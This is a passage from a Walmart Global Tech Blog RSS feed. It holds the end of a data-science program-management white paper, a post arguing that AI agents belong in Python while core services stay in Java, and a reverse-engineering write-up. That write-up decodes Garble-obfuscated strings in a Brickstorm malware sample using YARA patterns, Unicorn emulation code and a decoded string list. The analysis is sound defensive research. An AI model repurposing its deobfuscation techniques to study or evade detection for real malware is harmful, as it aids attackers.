<strong>Engage Data Engineering early</strong> to build pipelines in parallel with model development. Partner with business to <strong>set up dashboards </strong>to compare forecasts with past actuals.</p><p><strong>Phase 5: Deployment &amp; Change Management</strong></p><p>This phase focused on taking models from controlled development environments into production, ensuring they worked reliably within real-world systems. Running models are computationally intensive and require the correct infrastructure to run.</p><p><strong>Challenges</strong> — <strong>Scalability and Tooling Misalignment</strong></p><p>Large models demanded compute-heavy environments, but infrastructure provisioning was often treated as an afterthought, leading to late-stage delays. For example, model training slowed drastically when cloud capacity was not reserved in advance. On top of this, Data Science and Engineering teams operated in incompatible environments, causing runtime failures and failed deployments</p><p><strong>TPM Intervention</strong></p><p>Infrastructure provisioning was made a mandatory kick-off task for all initiatives. Cloud capacity was provisioned early, with compatibility checks and sandbox validations built into the project timeline. This shift ensured alignment between Data Science and Engineering from the outset, reducing friction at deployment time. We also planned costs upfront with DS, Engineering, and Business teams to forecast compute needs and budgets. This gave financial clarity and confidence that the approach would be sustainable, deliver ROI, and support long-term growth.</p><p><strong>Outcome</strong></p><p>The structured approach minimized runtime failures and unblocked deployments. Teams no longer lost time to environment mismatches, and models were deployed faster, with more predictable cost and compute efficiency.</p><p><strong>Key Takeaway</strong></p><p>Plan early for the needed infrastructure, define deployment strategies (batch, real-time, A/B testing), plan integration with downstream applications, and establishing rollback plus monitoring mechanisms.</p><p><strong>Phase 6: Monitoring &amp; Optimization</strong></p><p>Post-deployment, the priority shifted to tracking whether forecasts translated into measurable business outcome. Deviations would need to be handled by the team accountable for the specific problem seen</p><p><strong>Challenges</strong> — <strong>Scalability and Tooling Misalignment</strong></p><p>Early on, teams struggled with unclear accountability — pipeline errors sat with Engineering, while missed accuracy thresholds were debated between Analytics and Data Science.</p><p><strong>TPM Intervention</strong></p><p>Define clear accountability for post-deployment anomalies by creating ownership maps and SLA-based resolution timelines. Assign pipeline issues to Engineering, accuracy deviations to Data Science, and business validation gaps to Analytics. Use real-time dashboards to track anomalies and enforce SLAs.</p><p><strong>Outcome</strong></p><p>By introducing a formal ownership map and lightweight dashboards, every anomaly had a clear owner and SLA for resolution. This not only accelerated troubleshooting but also created a repeatable loop where insights directly fed into model retraining, keeping performance aligned with business expectations.</p><p><strong>Key Takeaway</strong></p><p>Establish <strong>clear accountability for issues</strong> that are anticipated when the solution is deployed and keep performance aligned with business KPIs.</p><p><strong>✅ Conclusion: A Scalable Framework Emerges</strong></p><p>A structured, phase-driven approach to Data Science program management enables scalable and predictable outcomes. By anchoring planning to business objectives and measurable success metrics, proactively resolving data quality gaps, and modularizing modelling work for parallel progress, TPMs fostered team alignment and accelerated delivery. Early definition of validation scenarios and infrastructure needs ensured forecasts were both accurate and operationally trusted, while robust deployment strategies minimized runtime failures. Post-launch, clear accountability and real-time dashboards enabled rapid troubleshooting and continuous model improvement. Collectively, these interventions delivered speed with rigor, improved forecast accuracy, drove stakeholder adoption, and established a repeatable framework for tangible business impact.</p><p>“<em>Because there is so much experimentation, there is a possibility that the problem statement gets invalidated based on the outcomes derived.”</em></p><p><strong>5.</strong> <strong>References</strong></p><p>· Project Management Institute (PMI). “A Guide to the Project Management Body of Knowledge (PMBOK® Guide)”. This guide offers a comprehensive framework for managing projects effectively and can be adapted for Data Science programs.</p><p>· Google Cloud. “AI &amp; Machine Learning Products”. Learn about tools and platforms that can enhance data validation, tracking, and goal alignment.</p><p>· McKinsey &amp; Company. “The Analytics Translator: Bridging the Gap between Data Science and Business”. This article provides insights into aligning data science goals with business priorities.</p><p>· Harvard Business Review. “Why IT Fumbles Analytics”. This resource discusses the challenges of managing analytics projects and offers practical strategies for success.</p><p>· <strong>Machine Learning Operations: Model handover (from Data Science to Engineering) Process checklist</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iY4JmZUc9aCJmt6LR65H4g.png" /></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=08dc2535bd1a" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/white-paper-on-data-science-technical-program-management-08dc2535bd1a">White Paper on Data Science Technical Program Management</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Keeping Java as the Core, Python to Lead Agentic Systems]]></title>
            <link>https://medium.com/walmartglobaltech/keeping-java-as-the-core-python-to-lead-agentic-systems-e2960693e1cd?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/e2960693e1cd</guid>
            <category><![CDATA[ai-agent]]></category>
            <category><![CDATA[agentic-applications]]></category>
            <category><![CDATA[ai-agent-development]]></category>
            <dc:creator><![CDATA[Anil Gothal]]></dc:creator>
            <pubDate>Mon, 15 Dec 2025 16:35:38 GMT</pubDate>
            <atom:updated>2025-12-15T16:35:38.901Z</atom:updated>
            <content:encoded><![CDATA[<p>We’ve been a Java shop for years, and now agentic AI demands us to rethink.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cKEBACyju1WFd52yOjCm_A.png" /></figure><h3>How I got here?</h3><p>I’ve been in the Java world for more than 30 years. Java has been my default answer to “what should we build this in?” for most of my career. I’ve seen it grow from applets and early web apps to large-scale enterprise systems, microservices, and cloud-native platforms.</p><p>I’ve loved Java and still do. It has given me a solid, safe, and scalable way to build systems that actually <strong>run in production</strong>.</p><p>For most of my career, this mental model worked:</p><blockquote>New system? Java<br>New service? Java<br>Something serious, important, enterprise? Java</blockquote><p>Then, earlier this year, I stepped into the agentic AI ecosystem and that “Java first” instinct started working <strong>against</strong> me!</p><h3>When “Java first” started to hurt?</h3><p>I tried to stay in my comfort zone. I tried.</p><ul><li>I built my first <strong>MCP server blueprint</strong> using Spring Framework (org.springframework.ai) around May, 2025 (early release), when everything in this space was just geting started.</li><li>I built an early <strong>local AI agent</strong> using a Java with google ADK to wire tools and tasks together.</li></ul><p>On paper, it looked great:</p><blockquote>1. Java<br>2. Spring<br>3. Strong typing<br>4. Familiar tooling</blockquote><p>But in practice, it felt like I was constantly <strong>swimming upstream</strong>:</p><blockquote>More glue code than I wanted<br>More boilerplate<br>More “why is this so hard?” moments<br>More time fighting infrastructure instead of experimenting with AI behavior</blockquote><p>That’s when I realized: I hadn’t hit a wall because Java is “bad”. I hit a wall because <strong>agentic AI is a different kind of work</strong> than what we historically do in Java.</p><h3>What actually changed with agentic AI?</h3><h4>Speed and first-class support</h4><p>In the LLM / agent ecosystem, almost everything shows up in Python first:</p><blockquote>New libraries<br>New patterns<br>New evaluation frameworks<br>Community research code, tutorials, etc.</blockquote><p>If you want to try an idea <strong>today</strong>, chances are:</p><blockquote>The official examples is in Python<br>The reference implementation is in Python<br>The community discussion assumes Python</blockquote><p>In Java, I kept finding myself in <strong>DIY mode</strong>:</p><blockquote>“There’s a Python example… ok, now let me re-create the entire stack in Java, adjust types, wiring, configs, and hope it behaves the same.”</blockquote><p>That’s not where you want to spend your time when everything in AI is changing weekly.</p><h4>Experimentation vs. stability</h4><p>Traditional Java enterprise systems optimize for <strong>stability</strong>:</p><blockquote>1. Well-defined interfaces<br>2. Strict contracts<br>3. Long-lived services<br>4. Strong governance and change control</blockquote><p>Agentic AI optimizes for <strong>experimentation</strong>:</p><blockquote>1. Prompts change frequently (sometimes daily)<br>2. You add/remove tools <br>3. You try new reasoning flows<br>4. You swap models or providers to see what works better.</blockquote><p>Java and Spring are fantastic for <strong>long-lived, stable, governed microservices</strong>. They are <em>not</em> naturally optimized for the messy, “try 10 ideas and keep 1” world of early AI experimentation.</p><p>For that kind of work, you want:</p><blockquote>Less ceremony<br>Faster iteration<br>Shorter feedback loops</blockquote><p>That’s exactly where Python shines.</p><h4>Agent code is mostly orchestration, not the real business logic</h4><p>In the traditional world, <strong>the code that does the work</strong> lives inside your Java services:</p><blockquote>Business rules<br>Validations<br>Shorter feedback loops<br>Domain models<br>Transactions</blockquote><p>In the AI agent world, the heavy lifting shifts:</p><blockquote>The <strong>LLM</strong> does the reasoning, planning, and language understanding.<br><strong>Tools</strong> and <strong>data sources</strong> do the actual work (APIs, DB queries, searches, actions).</blockquote><p>The agent itself becomes mostly <strong>orchestration and glue</strong>:</p><blockquote>“Take user intent → figure out what tools to call → call them in the right order → reason about the responses → decide the next step.”</blockquote><p>This kind of glue code:</p><blockquote>Changes frequently<br>Lives close to prompts and model configs<br>Is easier to express in a concise, dynamic language<br>Domain models<br>Transactions</blockquote><p>Writing this orchestration in Python is simply <strong>much faster</strong> than doing it in Java.</p><h4>MCP servers are adapters, not full business systems</h4><p>When I wrote my first MCP server blueprint in Spring, I instinctively treated it like a typical enterprise service:</p><blockquote>Layers<br>DTOs<br>Configuration<br>Dependency injection<br>The whole Java “production-grade” toolkit!</blockquote><p>But that’s not what an MCP server really is.</p><p>An MCP server is basically an <strong>adapter</strong>:</p><blockquote>Receive a simple, structured request from the model<br>Call an existing service or database<br>Return a clean, structured response back</blockquote><p>That’s it.</p><p>For this kind of lightweight adapter work, Python is usually a better fit:</p><blockquote>Less boilerplate<br>Faster to write and publish<br>Easier to iterate as your tools and schemas evolve</blockquote><h3>A Let’s take scenario, two approaches</h3><p><strong>Scenario:</strong><br> “<em>Given a customer’s request, decide whether to approve an order, check credit, apply discounts, and notify.</em>”</p><h4>If I build this purely in Java</h4><p>I’m tempted to:</p><blockquote>1. Design a full microservice (or several)<br>2. Define DTOs, interfaces, and controller endpoints<br>3. Bake the logic into Java classes<br>4. Go through normal deployment, governance, and release cycles</blockquote><p>This is great when the rules are <strong>stable</strong> and you want strong guarantees.</p><h4>If I build this with Python agents + Java services</h4><p>I change my mindset:</p><blockquote>1. Keep the <strong>core logic and data</strong> in Java: credit-service pricing-service profile-service <br>2. Add a <strong>Python agent</strong> that: Talk to the LLM, Calls those Java services via MCP tools or HTTP APIs,<em> </em><br>3. and Orchestrates the flow: “Check credit → if high-risk, ask for manual review → otherwise, fetch pricing → apply rules → approve/deny → send notification.</blockquote><p>Whenever the decision logic or flow changes:</p><blockquote><em>I mostly update </em><strong><em>Python agent behavior and prompts</em></strong><em>.<br>Java services stay stable, governed, and reliable.</em></blockquote><p>This feels <strong>natural</strong>: Java keeps doing what it’s amazing at; Python takes the fast-changing orchestration role around the AI.</p><h3>The key realization: it’s not Java vs Python</h3><p>The important shift for me was this:</p><blockquote><em>I don’t need to choose </em><strong><em>Java or Python</em></strong><em>.<br>I need to choose </em><strong><em>where Java is right</em></strong><em>, and </em><strong><em>where Python is right</em></strong><em>.</em></blockquote><p>From my experience so far:</p><h4>Where Java is still the best choice?</h4><blockquote>1. Core business services<br>2. Transactional systems of record<br>3. High-QPS, low-latency APIs<br>4. Long-lived, stable, well-governed microservices<br>5. Places where you need strict contracts, compliance, and reliability over many years.</blockquote><h4>Where Python is the better choice?</h4><blockquote>1. AI agents (prompt-heavy, fast-changing, experiment-driven)<br>2. MCP servers and tools (adapters exposing data/actions to models)<br>3. Data science, ML training, feature engineering, evaluation pipelines<br>4. Prototypes and “let’s see if this works” flows</blockquote><p>When I tried to force <strong>agents</strong> and <strong>MCP patterns</strong> into pure Java/Spring, I could make it work, but it felt like:</p><blockquote><em>Writing a UI in assembly language: technically possible, but you’re fighting the grain of the tools.</em></blockquote><h3>A simple architectural pattern: Java in the middle, Python at the edge</h3><p>The way I now think about it is in <strong>layers</strong>:</p><blockquote><strong>1. Core Systems (Java)</strong><br>-Systems of record<br>-Domain logic, validations, transactions<br>-APIs with stable contracts</blockquote><blockquote><strong>2. Adapters / Tools (Mostly Python MCP servers)</strong><br>-Thin wrappers around those Java services and databases<br>-Fast to change, but still structured and testable</blockquote><blockquote><strong>3. Agents &amp; Experiences (Python + LLMs)</strong><br>-Agent logic (tool selection, sequencing, reasoning about results)<br>-Experiments, new flows, new user journeys</blockquote><p>If I had to describe it in one line:</p><blockquote><strong><em>Java holds the truth. Python explores the possibilities.</em></strong></blockquote><h3>How I personally envison the work today?</h3><p>My mental model now is very simple:</p><blockquote><strong>Java</strong>: the backbone — where the business actually lives.</blockquote><blockquote><strong>Python</strong>: the face and the hands — where the AI lives, coordinates, and experiments.</blockquote><p>I still love Java. I still default to Java when I think about <strong>serious, long-term systems</strong>.</p><p>But when it comes to AI <strong>Agents, MCP servers, and fast-moving agentic work</strong>, I’ve learned to let Python lead — not because Java can’t do it, but because it’s not the right kind of tool for that style of work.</p><h3>One resource I <strong>recommend</strong> helpful for Java folks</h3><p>As a Java person stepping into Python, I found it useful to learn in a way that speaks my language and constraints. One book I personally enjoyed to get started is:</p><blockquote><a href="https://www.goodreads.com/book/show/77053786-python-for-java-developers"><strong>Python for Java Developers: A Handbook for Busy Experts<em> — Pedro Cavaléro</em></strong></a></blockquote><p>It doesn’t try to convince you that Java is obsolete. It simply helps you quickly <strong>see how to think in Python</strong> without abandoning everything you know from decades of Java.</p><p>If you’re a Java veteran like me, you don’t have to choose sides.<br>Keep Java as the core.<br>Let Python lead your agentic systems.<br>Use each tech stack and language where it’s naturally strong and your architecture (and teams) will thank you for it!</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=e2960693e1cd" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/keeping-java-as-the-core-python-to-lead-agentic-systems-e2960693e1cd">Keeping Java as the Core, Python to Lead Agentic Systems</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Decoding Brickstorms Garble strings]]></title>
            <link>https://medium.com/walmartglobaltech/decoding-brickstorms-garble-strings-b0a60828b3cc?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/b0a60828b3cc</guid>
            <category><![CDATA[malware]]></category>
            <category><![CDATA[infosec]]></category>
            <category><![CDATA[golang]]></category>
            <category><![CDATA[reverse-engineering]]></category>
            <dc:creator><![CDATA[Jason Reaves]]></dc:creator>
            <pubDate>Thu, 04 Dec 2025 20:39:03 GMT</pubDate>
            <atom:updated>2025-12-04T20:39:02.303Z</atom:updated>
            <content:encoded><![CDATA[<p>By: Jason Reaves</p><p>From the recent attention to Brickstorm in public reporting, I analyzed the Brickstorm sample listed below that was recently uploaded to Virustotal:</p><pre>90b760ed1d0dcb3ef0f2b6d6195c9d852bcb65eca293578982a8c4b64f51b035</pre><p>This sample was obfuscated via an open-source Golang tool called Garble[4] which was mentioned by Mandiant[1]. Mandiant also released a tool for decoding Garble strings[2] which was based on prior work by OALabs[3].</p><p>A quick note before diving in: I developed my string decoder independently, without first reviewing the work published by Google Threat Intelligence (GTI). Interestingly, my approach ended up aligning closely with their research on similar samples. I want to spotlight the method detailed in GTI’s blog, which takes a deep dive into Garble’s AST transformation code, a technique that offered valuable insight into how the obfuscation operates.</p><p>The strings are mostly stack based although some of the larger ones reside elsewhere and are loaded.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tBOygD0mb1GkiE6XCNdESw.png" /></figure><p>For harvesting the bytecode sequences I decided to leverage a few possible yara rules which started strict and was relaxed as I continued my work:</p><pre>#good for most<br>#rules = yara.compile(source=&#39;rule urls { strings: $a1 = {48 b8 [8] 48 89 [3] 48 b8 [10-200] 48 [2] 48 [3] 7c ??} condition: all of them }&#39;)<br>rules = yara.compile(source=&#39;rule urls { strings: $a1 = {48 b8 [8] 48 89 [3] [10-400] 48 [2] 48 [3] 7c ??} condition: all of them }&#39;)<br>rules2 = yara.compile(source=&#39;rule urls { strings: $a1 = {48 8d [1-5] c? 44 [6] [10-400] 48 [2] 48 [3] 7c ??} condition: all of them }&#39;)<br></pre><p>After retrieving all the matches and removing possible substrings I can emulate the code:</p><pre>blobs = uniq_blobs<br>out = b&#39;&#39;<br>if True:<br>    STACK=0x9000<br>    code_base = 0x100000<br><br>    for blob in blobs:<br>        mu = Uc(UC_ARCH_X86,UC_MODE_64)<br>        mu.mem_map(code_base, 0x100000)<br>        mu.mem_map(STACK, 4096*10)<br>        #Make sure it ends gracefully<br>        blob = blob.matched_data+b&#39;\x90\x90\x90&#39;<br>        #Debugging<br>        #if binascii.unhexlify(&#39;48b8532f2e5e6d03c6b1488944244048&#39;) in blob:<br>        #    print(&quot;Found it&quot;)<br>        #    print(binascii.hexlify(blob))<br>        mu.mem_write(code_base, b&#39;\x00&#39;*0x100000)<br>        mu.mem_write(STACK, b&#39;\x00&#39;*(4096*10))<br><br>        mu.mem_write(code_base,blob)<br>        #Debugging:<br>        #mu.hook_add(UC_HOOK_BLOCK, hook_block)<br>        #mu.hook_add(UC_HOOK_CODE, hook_code)<br>        mu.reg_write(UC_X86_REG_RSP,STACK+4096)<br>        mu.reg_write(UC_X86_REG_RBP,STACK+4096)<br>        mu.reg_write(UC_X86_REG_ESP,STACK+4096)<br>        mu.reg_write(UC_X86_REG_EBP,STACK+4096)<br>        mu.reg_write(UC_X86_REG_RAX,0)<br>        try:<br>            mu.emu_start(code_base, code_base+len(blob), timeout=10000)<br>        except:<br>            continue<br>        a = mu.mem_read(STACK,4096*10)<br>        a = b&#39;&#39;.join(a.split(b&#39;\x00&#39;))<br>        l = mu.reg_read(UC_X86_REG_RAX)+1<br>        if len(a) &gt; 0:<br>            print(str(a)[-l:])<br>            out += a</pre><p>I noticed afterwords that OALabs also used a hook but they did so to find the next call instruction:</p><pre>    def trace(uc, address, size, user_data):<br>        insn = next(cs.disasm(uc.mem_read(address, size), address))<br>        #print(f&quot;{address:#010x}:\t{insn.mnemonic}\t{insn.op_str}&quot;)<br>        if insn.mnemonic == &#39;call&#39;:<br>            #print(&quot;Ending on a call!&quot;)<br>            uc.emu_stop()</pre><p>I like this approach and will definitely leverage it later, I primarily used hooks for debugging my code in comparison:</p><pre>def hook_block(uc, address, size, user_data):<br>    print(&quot;&gt;&gt;&gt; Tracing basic block at 0x%x, block size = 0x%x&quot; %(address, size))<br><br>def hook_code(uc, address, size, user_data):<br>    print(user_data)<br>    print(uc.reg_read(UC_X86_REG_RCX))<br>    print(&quot;&gt;&gt;&gt; Tracing instruction at 0x%x, instruction size = 0x%x&quot; %(address, size))<br><br>#Debugging:<br>#mu.hook_add(UC_HOOK_BLOCK, hook_block)<br>#mu.hook_add(UC_HOOK_CODE, hook_code)<br></pre><p>This won’t get every single string as some are passed as offsets to the data residing in rodata section for longer pieces. Decoding:</p><pre>Handshake&#39;<br>undefined&#39;<br>invalid perspective&#39;<br>Handshake&#39;<br>0-RTT Protected&#39;<br>unknown packet type: %d&#39;<br>QUIC_GO_LOG_LEVEL&#39;<br>initial RTT set after first measurement&quot;<br>%#x doesn&#39;t fit into 62 bits&quot;<br>invalid varint length&quot;<br>cannot encode %d in %d bytes&quot;<br>value doesn&#39;t fit into 62 bits: &quot;<br>chacha20: wrong key size&#39;<br>chacha20: SetCounter attempted to rollback counter&quot;<br>chacha20: output smaller than input&#39;<br>chacha20: invalid buffer overlap&#39;<br>chacha20: internal error: wrong dst and/or src length&#39;<br>chacha20: wrong HChaCha20 key size&#39;<br>chacha20: wrong HChaCha20 nonce size&#39;<br>GODEBUG sys/cpu: no value specified for &quot;&#39;<br>GODEBUG sys/cpu: value &quot;&#39;<br>&quot; not supported for cpu option &quot;&#39;<br>GODEBUG sys/cpu: unknown cpu feature &quot;&#39;<br>GODEBUG sys/cpu: can not enable &quot;&#39;<br>, missing CPU support\n&#39;<br>GODEBUG sys/cpu: can not disable &quot;&#39;<br>, required CPU feature\n&#39;<br>avx512vbmi&#39;<br>avx512vnniw&#39;<br>avx5124fmaps&#39;<br>avx512vpopcntdq&#39;<br>avx512gfni&quot;<br>avx512vaes&#39;<br>avx512vbmi2&#39;<br>avx512bitalg&#39;<br>avx512bf16&#39;<br>pclmulqdq&#39;<br>poly1305: write to MAC after Sum or Verify&#39;<br>chacha20poly1305: bad nonce length passed to Seal&#39;<br>chacha20poly1305: plaintext too large&#39;<br>chacha20poly1305: bad nonce length passed to Open&quot;<br>chacha20poly1305: ciphertext too large&#39;<br>chacha20poly1305: invalid buffer overlap&quot;<br>chacha20poly1305: invalid buffer overlap&quot;<br>chacha20poly1305: invalid buffer overlap&#39;<br>chacha20poly1305: invalid buffer overlap&quot;<br>20060102150405Z0700&#39;<br>cryptobyte: pending child length %d exceeds %d-byte length prefix&quot;<br>cryptobyte: BuilderContinuation reallocated a fixed-size buffer&quot;<br>cryptobyte: attempted write while child is pending&quot;<br>cryptobyte: length overflow&#39;<br>cryptobyte: Builder is exceeding its fixed-size buffer&#39;<br>bad point length: %d, expected %d&#39;<br>bad input point: low order point&#39;<br>hkdf: entropy limit reached&#39;<br>close notify&#39;<br>unexpected message&#39;<br>bad record MAC&#39;<br>decryption failed&#39;<br>record overflow&#39;<br>decompression failure&#39;<br>handshake failure&#39;<br>bad certificate&#39;<br>unsupported certificate&#39;<br>revoked certificate&#39;<br>expired certificate&#39;<br>unknown certificate&#39;<br>illegal parameter&#39;<br>unknown certificate authority&#39;<br>access denied&#39;<br>error decoding message&#39;<br>error decrypting message&#39;<br>export restriction&#39;<br>protocol version not supported&#39;<br>insufficient security level&quot;<br>internal error&#39;<br>inappropriate fallback&#39;<br>user canceled&#39;<br>unsupported extension&#39;<br>certificate unobtainable&#39;<br>unrecognized name&#39;<br>bad certificate status response&#39;<br>certificate required&#39;<br>no application protocol&#39;<br>GTLS 1.3, server CertificateVerify&quot;<br>_TLS 1.3, client CertificateVerify&#39;<br>tls: no certificates configured&#39;<br>CLIENT_RANDOM&#39;<br>CLIENT_EARLY_TRAFFIC_SECRET&#39;<br>CLIENT_HANDSHAKE_TRAFFIC_SECRET&quot;<br>SERVER_HANDSHAKE_TRAFFIC_SECRET&#39;<br>CLIENT_TRAFFIC_SECRET_0&#39;<br>SERVER_TRAFFIC_SECRET_0&#39;<br>tls: invalid ClientKeyExchange message&#39;<br>tls: invalid ServerKeyExchange message&#39;<br>res binder&#39;<br>c hs traffic&#39;<br>s hs traffic&#39;<br>c ap traffic&#39;<br>s ap traffic&#39;<br>exp master&#39;<br>res master&#39;<br>traffic upd&#39;<br>master secret&#39;<br>key expansion&quot;<br>client finished&quot;<br>server finished&#39;<br>tls: alert(&#39;<br>expected an ECDSA public key, got %T&#39;<br>Ed25519 verification failure&#39;<br>expected an RSA public key, got %T&quot;<br>expected an RSA public key, got %T&#39;<br>internal error: unknown signature type&#39;<br>unsupported signature algorithm: %v&quot;<br>unsupported signature algorithm: %v&#39;<br>tls: Ed25519 public keys are not supported before TLS 1.2&#39;<br>tls: unsupported public key: %T&#39;<br>tls: unsupported certificate: private key is %T, expected *%T&#39;<br>tls: certificate private key (%T) does not implement crypto.Signer&#39;<br>tls: unsupported certificate curve (%s)&#39;<br>tls: certificate RSA key size too small for supported signature algorithms&#39;<br>tls: unsupported certificate key (%T)&quot;<br>tls: peer doesn&#39;t support the certificate custom signature algorithms&quot;<br>tls: internal error: unsupported key (%T)&#39;<br>tls: internal error: wrong nonce length&#39;<br>tls: internal error: wrong nonce length&#39;<br>tls: internal error: wrong nonce length&quot;<br>tls: unable to generate random session ticket key: %v&#39;<br>s %x %x\n&#39;<br>tls: received unexpected handshake message of type %T when waiting for %T&#39;<br>TLS: sequence number wraparound&#39;<br>unknown cipher type&#39;<br>unknown cipher type&#39;<br>unknown cipher type&quot;<br>unsupported SSLv2 handshake received&#39;<br>received record with version %x when expecting version %x&#39;<br>remote error&#39;<br>remote error&#39;<br>tls: too many ignored records&#39;<br>local error&#39;<br>local error&#39;<br>unknown cipher type&#39;<br>tls: handshake message of length %d bytes exceeds maximum of %d bytes&#39;<br>tls: internal error: unexpected renegotiation&#39;<br>tls: unknown Renegotiation value&quot;<br>tls: too many non-advancing records&#39;<br>tls: received unexpected handshake message of type %T&#39;<br>tls: internal error: handshake should have had a result&#39;<br>tls: invalid NextProtos value&#39;<br>tls: NextProtos values too large&#39;<br>tls: no supported versions satisfy MinVersion and MaxVersion&#39;<br>tls: short read from Rand: &quot;<br>tls: short read from Rand: &#39;<br>c e traffic&quot;<br>resumption&#39;<br>tls: server selected unsupported protocol version %x&#39;<br>tls: received unexpected CertificateStatus message&#39;<br>tls: server&#39;s identity changed during renegotiation&quot;<br>tls: failed to write to key log: &#39;<br>tls: server selected unsupported compression format&#39;<br>tls: initial handshake had non-empty renegotiation extension&quot;<br>tls: server advertised unrequested ALPN extension&#39;<br>tls: server resumed a session with a different version&#39;<br>tls: server resumed a session with a different cipher suite&#39;<br>tls: server&#39;s Finished message was incorrect&quot;<br>tls: server selected TLS 1.3 using the legacy version field&#39;<br>tls: server selected an invalid version after a HelloRetryRequest&#39;<br>tls: server sent an incorrect legacy version&#39;<br>tls: server sent a ServerHello extension forbidden in TLS 1.3&quot;<br>tls: server selected unsupported compression format&#39;<br>tls: server changed cipher suite after a HelloRetryRequest&quot;<br>tls: server sent an unnecessary HelloRetryRequest message&quot;<br>tls: received malformed key_share extension&#39;<br>tls: server selected unsupported group&quot;<br>tls: server sent an unnecessary HelloRetryRequest key_share&quot;<br>tls: server sent a cookie in a normal ServerHello&#39;<br>tls: malformed key_share extension&#39;<br>tls: server did not send a key share&#39;<br>tls: server selected unsupported group&#39;<br>tls: server selected an invalid PSK&#39;<br>tls: server selected an invalid PSK and cipher suite pair&#39;<br>tls: invalid server key share&#39;<br>LPN negotiation failed. Server didn\&#39;t offer any protocols&#39;<br>ALPN negotiation failed. Server offered: %q&#39;<br>tls: server advertised unrequested ALPN extension&#39;<br>tls: certificate used with invalid signature algorithm&#39;<br>tls: certificate used with invalid signature algorithm&quot;<br>tls: invalid signature by the server certificate: &#39;<br>tls: invalid server finished hash&#39;<br>tls: failed to sign handshake: &#39;<br>tls: received a session ticket with invalid lifetime&#39;<br>invalid value length: expected %d, got %d&#39;<br>tls: internal error: failed to update binders&#39;<br>tls: negotiated TLS &lt; 1.3 when using QUIC&#39;<br>tls: client offered old TLS version %#x&#39;<br>tls: client offered only unsupported versions: %x&#39;<br>tls: client does not support uncompressed connections&quot;<br>tls: initial handshake had non-empty renegotiation extension&#39;<br>tls: unsupported signing key type (%T)&#39;<br>tls: unsupported decryption key type (%T)&quot;<br>tls: no cipher suite supported by both client and server&#39;<br>tls: client using inappropriate protocol fallback&#39;<br>tls: client certificate used with invalid signature algorithm&#39;<br>tls: invalid signature by the client certificate: &#39;<br>ls: client\&#39;s Finished message is incorrect&#39;<br>tls: failed to parse client certificate: &quot;<br>ls: client didn\&#39;t provide a certificate&#39;<br>tls: failed to verify client certificate: &#39;<br>tls: client certificate contains an unsupported public key of type %T&#39;<br>tls: client used the legacy version field to negotiate TLS 1.3&#39;<br>tls: client using inappropriate protocol fallback&#39;<br>tls: TLS 1.3 client supports illegal compression methods&#39;<br>b&#39;\x1c9\xbfZ8\xf4\xe1\xccWH\x8eUE4\x19\xb4\x85\x87qS%D\xe8\xe6\tH\xb8\xf3&#39;<br>f\xa5#!\xef9 handshake had non-empty renegotiation extension&#39;<br>tls: no cipher suite supported by both client and server&quot;<br>tls: no ECDHE curve supported by both client and server&#39;<br>tls: invalid or missing PSK binders&#39;<br>tls: client sent unexpected early data&#39;<br>resumption&#39;<br>tls: internal error: failed to clone hash&quot;<br>tls: invalid PSK binder&quot;<br>c e traffic&#39;<br>tls: client sent invalid key share in second ClientHello&#39;<br>tls: client indicated early data in second ClientHello&#39;<br>tls: client illegally modified second ClientHello&#39;<br>tls: client offered 0-RTT data in second ClientHello&#39;<br>ALPN negotiation failed. Client offered: %q&#39;<br>tls: failed to sign handshake: &#39;<br>tls: client certificate used with invalid signature algorithm&#39;<br>tls: client certificate used with invalid signature algorithm&#39;<br>tls: invalid signature by the client certificate: &#39;<br>tls: invalid client finished hash&#39;<br>tls: certificate private key does not implement crypto.Decrypter&quot;<br>tls: unexpected ServerKeyExchange&#39;<br>tls: no supported elliptic curves offered&#39;<br>tls: certificate cannot be used with the selected cipher suite&#39;<br>tls: failed to sign ECDHE parameters: &#39;<br>tls: server selected unsupported curve&quot;<br>tls: server selected unsupported curve&#39;<br>tls: certificate used with invalid signature algorithm&#39;<br>tls: invalid signature by the server certificate: &#39;<br>tls: missing ServerKeyExchange message&#39;<br>tls: HKDF-Expand-Label invocation failed unexpectedly&#39;<br>tls: internal error: unsupported curve&#39;<br>unknown version&#39;<br>server finished&#39;<br>master secret&#39;<br>key expansion&#39;<br>crypto/tls: reserved ExportKeyingMaterial label: %s&#39;<br>crypto/tls: ExportKeyingMaterial context too long&#39;<br>tls: internal error: session ticket keys unavailable&#39;<br>tls: failed to create cipher while encrypting ticket: &#39;<br>tls.ConnectionState doesn\&#39;t match&#39;<br>qtls.ClientSessionState doesn&#39;t match&quot;<br>qtls.CertificateRequestInfo doesn&#39;t match&quot;<br>CONNECTION_REFUSED&#39;<br>FLOW_CONTROL_ERROR&#39;<br>STREAM_LIMIT_ERROR&#39;<br>STREAM_STATE_ERROR&#39;<br>INVALID_TOKEN&#39;<br>APPLICATION_ERROR&quot;<br>CRYPTO_BUFFER_EXCEEDED&#39;<br>NO_VIABLE_PATH&#39;<br>CRYPTO_ERROR (%#x)&#39;<br>unknown error code: %#x&#39;<br> (frame type: %#x)&#39;<br>Application error %#x&quot;<br>timeout: handshake did not complete in time&#39;<br>no compatible QUIC version found (we support %s, server offered %s)&quot;<br>received a stateless reset with token %x&#39;<br>unsupported version&#39;<br>invalid first ACK range&#39;<br>invalid packet number length: %d&#39;<br>invalid connection ID length: %d bytes&#39;<br>invalid connection ID length: %d bytes&#39;<br>invalid packet number length: %d&#39;<br>unknown frame type&#39;<br>%s not allowed at encryption level %s&#39;<br>unknown encryption level&#39;<br>not a QUIC packet&#39;<br>{Largest: %d, Smallest: %d}&quot;<br>t%s 